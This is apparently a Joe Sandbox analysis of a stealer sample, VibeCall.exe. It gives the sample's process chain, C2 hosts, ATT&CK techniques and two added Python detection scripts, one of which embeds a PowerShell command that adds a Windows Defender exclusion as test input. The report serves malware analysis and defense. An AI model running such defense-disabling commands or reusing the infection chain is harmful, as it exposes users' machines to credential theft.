                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013B7C40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,14_3_013B7C40
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: VibeCall.exe, 00000000.00000003.2211200780.000001CCB5C5C000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2214515021.000001CCB5C66000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2212397068.000001CCB5C97000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2213028362.000001CCB5CC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
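The behavior records above all share one line shape: `Source: <process> <event type>: <detail>`, and the web extraction of these reports tends to fuse the process path onto the event type (`.exeQueries`) and leave the `Jump to behavior` link text hanging off the end. The Python below is an added example, not part of the Joe Sandbox report: it parses that format tolerantly, groups records per process and raises three triage flags that map to what this section shows (a `root\SecurityCenter2` AntiVirusProduct enumeration, a MachineGuid read, and `socket` plus `bind` in the same function). The sample lines are copied from this section; the flag names and the idea of counting font-file queries separately are the example's own choices, and the flags are triage hints rather than verdicts.

```python
"""Triage Joe Sandbox behavior lines: parse, group per process, flag.

Added example, not part of the Joe Sandbox report. REPORT_LINES are copied
from this report's behavior section (one is left with the fused ".exeWMI" and
trailing "Jump to behavior" link text that web extraction leaves behind); the
flag names are this example's own choices.
"""
import re
from collections import Counter, defaultdict

REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\VibeCall.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation",
    r"Source: C:\Users\user\Desktop\VibeCall.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: "
    r"C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation",
    r"Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_3_013B7C40 "
    r"GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,14_3_013B7C40",
    r"Source: C:\Windows\SysWOW64\fontdrvhost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid",
    r"Source: C:\Users\user\Desktop\VibeCall.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct",
    r"Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProductJump to behavior",
    r"Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 31_2_056EAB70 "
    r"socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError,31_2_056EAB70",
]

EVENT_TYPES = ("Queries volume information", "Code function", "Key value queried", "WMI Queries")

# Process path ends at the first .exe/.dll; whitespace between path and event type is optional
# because extraction often drops it; a trailing "Jump to behavior" link label is discarded.
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.(?:exe|dll))\s*"
    r"(?P<event>" + "|".join(EVENT_TYPES) + r"):\s*"
    r"(?P<detail>.*?)(?:\s*Jump to behavior)?\s*$"
)


def parse_line(line):
    """Return {'src', 'event', 'detail', 'process'} or None for lines of another shape."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["process"] = rec["src"].rsplit("\\", 1)[-1].lower()
    return rec


def parse_report(lines):
    return [r for r in (parse_line(line) for line in lines) if r]


def flags_for(rec):
    """Triage flags derived from one record (example's own names)."""
    event, detail = rec["event"], rec["detail"]
    flags = set()
    if event == "WMI Queries" and "antivirusproduct" in detail.lower():
        flags.add("av_enumeration")          # root\SecurityCenter2 AntiVirusProduct lookup
    if event == "Key value queried" and detail.rstrip().endswith("MachineGuid"):
        flags.add("machine_guid_read")       # stable host identifier, typical victim ID
    if event == "Code function" and " " in detail:
        apis = {a.strip().lower() for a in detail.split(" ", 1)[1].split(",")}
        if {"socket", "bind"} <= apis:
            flags.add("socket_bind")         # function that can open a listening port
    return flags


def summarize(records):
    """Per-process event counts, font-query count and the union of flags."""
    summary = defaultdict(lambda: {"events": Counter(), "font_queries": 0, "flags": set()})
    for r in records:
        s = summary[r["process"]]
        s["events"][r["event"]] += 1
        if r["event"] == "Queries volume information" and "\\fonts\\" in r["detail"].lower():
            s["font_queries"] += 1
        s["flags"] |= flags_for(r)
    return dict(summary)


def triage(lines):
    return summarize(parse_report(lines))


if __name__ == "__main__":
    for proc, s in triage(REPORT_LINES).items():
        print(proc, dict(s["events"]), "fonts:", s["font_queries"], "flags:", sorted(s["flags"]))
```

Run against a full report export, the per-process view separates the noisy font enumeration done by the GUI process from the records worth a closer look (the AV enumeration from the dropper, the MachineGuid read and the socket/bind capability inside fontdrvhost.exe).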

Stealing of Sensitive Information

Source: Yara match, file source: 0000001F.00000003.2481606661.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000012.00000003.2589680228.00000000014B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000028.00000003.2594352745.0000000002D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000003.2473382208.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000E.00000002.2462236062.0000000003080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000002.2488910018.0000000003020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000019.00000002.2541414419.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000019.00000003.2443435539.00000000003E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000028.00000002.2681935017.0000000003290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000E.00000003.2438929795.00000000013F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000012.00000002.2600997178.0000000001990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match, file source: 0000001F.00000003.2481606661.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000012.00000003.2589680228.00000000014B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000028.00000003.2594352745.0000000002D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000003.2473382208.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000E.00000002.2462236062.0000000003080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000002.2488910018.0000000003020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000019.00000002.2541414419.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000019.00000003.2443435539.00000000003E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000028.00000002.2681935017.0000000003290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000E.00000003.2438929795.00000000013F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000012.00000002.2600997178.0000000001990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\fontdrvhost.exe Code function: 31_2_056EAB70 socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError,31_2_056EAB70
MITRE ATT&CK Matrix

Techniques are listed per tactic column. The number in parentheses is the signature-count badge shown next to that technique in the report's matrix; techniques without a number are the matrix's unhighlighted entries.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation (141); PowerShell (1); At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (161); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); DLL Side-Loading (1)
Credential Access: Input Capture (21); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery (1); Security Software Discovery (361); Process Discovery (1); Virtualization/Sandbox Evasion (161); Application Window Discovery (1); System Network Configuration Discovery (1); System Information Discovery (144)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Input Capture (21); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Web Service (1); Encrypted Channel (11); Non-Standard Port (11); Ingress Tool Transfer (12); Non-Application Layer Protocol (3); Application Layer Protocol (124); Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID 1627611, sample VibeCall.exe, start date 02/03/2025, architecture WINDOWS, score 96)

Start node:
  Domains: pastebin.com (Connects to a pastebin service (likely for C&C)); rustaisolutionnorisk.com; 2 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Yara detected RHADAMANTHYS Stealer; 5 other signatures
  Starts: VibeCall.exe (node 10)

VibeCall.exe (node 10):
  Network: ip-api.com 208.95.112.1 (TUT-ASUS, United States); 147.45.60.20 (FREE-NET-ASFREEnetEU, Russian Federation); 2 other IPs or domains
  Dropped files (PE32): C:\Users\...\videosolution_vibecall_b.exe; C:\Users\...\soundsolution_vibecall_c.exe; C:\Users\...\contry_solution_vibecall_e.exe; C:\Users\user\...\aisolution_vibecall_a.exe
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender
  Starts: aisolution_vibecall_a.exe (node 15); videosolution_vibecall_b.exe (node 18); contry_solution_vibecall_e.exe (node 20); 4 other processes (node 22)

aisolution_vibecall_a.exe (node 15):
  Signatures: Multi AV Scanner detection for dropped file; Switches to a custom stack to bypass stack traces
  Starts: fontdrvhost.exe (node 25); WerFault.exe (node 29); WerFault.exe (node 31)

videosolution_vibecall_b.exe (node 18):
  Starts: fontdrvhost.exe (node 33); 2 other processes (node 39)

contry_solution_vibecall_e.exe (node 20):
  Starts: fontdrvhost.exe (node 35); 2 other processes (node 41)

4 other processes (node 22):
  Network: pastebin.com 104.20.4.235, 443, 49740 (CLOUDFLARENETUS, United States)
  Signatures: Antivirus detection for dropped file; Loading BitLocker PowerShell Module
  Starts: conhost.exe (node 37); 2 other processes (node 43)

fontdrvhost.exe (node 25, started by aisolution_vibecall_a.exe):
  Network: 171.22.120.233 (DEDIPATH-LLCUS, Latvia)
  Signatures: Performs DNS queries to domains with low reputation; Switches to a custom stack to bypass stack traces
  Starts: fontdrvhost.exe (node 45), which starts WerFault.exe (node 49)

fontdrvhost.exe (node 33, started by videosolution_vibecall_b.exe):
  Network: 45.129.185.24 (VDI-NETWORKUS, Russian Federation)
  Starts: fontdrvhost.exe (node 47)

fontdrvhost.exe (node 35, started by contry_solution_vibecall_e.exe):
  Network: api.mirrow1-dell.xyz; api.mirrow1-dell.xyz 79.141.168.8 (TELE-ASTeleAsiaLimitedHK, Bulgaria); 104.16.248.249 (CLOUDFLARENETUS, United States)
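The graph's most actionable detail for a defender is the process chain: VibeCall.exe on the Desktop drops `*_vibecall_*.exe` into the user's Temp directory, each of which launches `C:\Windows\SysWOW64\fontdrvhost.exe`, the process that then reaches the C2 addresses; alongside, PowerShell is run with the execution policy bypassed to add a Windows Defender exclusion. The Python below is an added example, not from the Joe Sandbox report: it rebuilds a process tree from Sysmon-style process-creation records and flags exactly those two things, decoding a base64 `-EncodedCommand` blob before looking for the Defender cmdlet so the check is not defeated by encoding. The events, PIDs and the PowerShell command line are constructed to mirror the graph, and the set of legitimate fontdrvhost.exe parents (winlogon.exe, wininit.exe) is general Windows knowledge rather than something the report states.

```python
"""Rebuild a process tree from Sysmon-style process-creation records and flag
the two behaviours the report's graph shows: fontdrvhost.exe with an
unexpected parent, and PowerShell that bypasses the execution policy and adds
a Defender exclusion (also when the script is base64-encoded).

Added example, not from the Joe Sandbox report. EVENTS, the PIDs and the
PowerShell command line are constructed to mirror the report's behavior graph.
"""
import base64
import re
from typing import Dict, List, NamedTuple, Optional


class ProcEvent(NamedTuple):
    pid: int
    ppid: int
    image: str
    cmdline: str


def encode_ps(script: str) -> str:
    """powershell -EncodedCommand takes base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed telemetry (not real): a legitimate boot chain plus the report's chain.
EVENTS = [
    ProcEvent(500, 4, r"C:\Windows\System32\wininit.exe", "wininit.exe"),
    ProcEvent(600, 500, r"C:\Windows\System32\winlogon.exe", "winlogon.exe"),
    ProcEvent(700, 600, r"C:\Windows\System32\fontdrvhost.exe", "fontdrvhost.exe"),  # legitimate UMFD host
    ProcEvent(5000, 600, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(5100, 5000, r"C:\Users\user\Desktop\VibeCall.exe", r"C:\Users\user\Desktop\VibeCall.exe"),
    ProcEvent(5200, 5100, r"C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe",
              r"C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe"),
    ProcEvent(5300, 5200, r"C:\Windows\SysWOW64\fontdrvhost.exe", r"C:\Windows\SysWOW64\fontdrvhost.exe"),
    ProcEvent(5400, 5100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -ExecutionPolicy Bypass -enc "
              + encode_ps(r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'")),
]

# Parents that legitimately launch fontdrvhost.exe (general Windows knowledge, not from the report).
LEGIT_FONTDRVHOST_PARENTS = {"winlogon.exe", "wininit.exe"}

# -EncodedCommand and the short forms powershell.exe accepts, followed by the base64 blob.
ENCODED_FLAG_RE = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
EXEC_POLICY_BYPASS_RE = re.compile(r"(?:^|\s)-(?:ex\w*|ep)\s+bypass", re.IGNORECASE)
DEFENDER_EXCLUSION_RE = re.compile(r"add-mppreference\b.*exclusion", re.IGNORECASE)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENCODED_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not base64, or not a UTF-16LE script
        return None


def ancestry(by_pid: Dict[int, ProcEvent], pid: int) -> List[str]:
    """Image names from the process up to the root, child first; loop-safe."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def detect(events: List[ProcEvent]) -> List[dict]:
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = image_name(parent.image) if parent else None
        chain = " <- ".join(ancestry(by_pid, e.pid))
        if name == "fontdrvhost.exe" and parent_name not in LEGIT_FONTDRVHOST_PARENTS:
            alerts.append({"rule": "fontdrvhost_unexpected_parent", "pid": e.pid, "chain": chain})
        if name in ("powershell.exe", "pwsh.exe"):
            if EXEC_POLICY_BYPASS_RE.search(e.cmdline):
                alerts.append({"rule": "execution_policy_bypass", "pid": e.pid, "chain": chain})
            script = decode_encoded_command(e.cmdline) or e.cmdline  # look inside -enc blobs too
            if DEFENDER_EXCLUSION_RE.search(script):
                alerts.append({"rule": "defender_exclusion_added", "pid": e.pid, "chain": chain, "script": script})
    return alerts


def alerts_by_rule(events: List[ProcEvent]) -> Dict[str, List[dict]]:
    grouped: Dict[str, List[dict]] = {}
    for a in detect(events):
        grouped.setdefault(a["rule"], []).append(a)
    return grouped


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a["rule"], a["pid"], a["chain"])
```

The parent check is deliberately a positive allow-list rather than a match on `SysWOW64`: a 32-bit fontdrvhost.exe launched from a Temp-resident dropper is the anomaly, and the reconstructed ancestry string gives the analyst the whole chain back to the Desktop executable in one line. The legitimate instance under winlogon.exe produces no alert.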
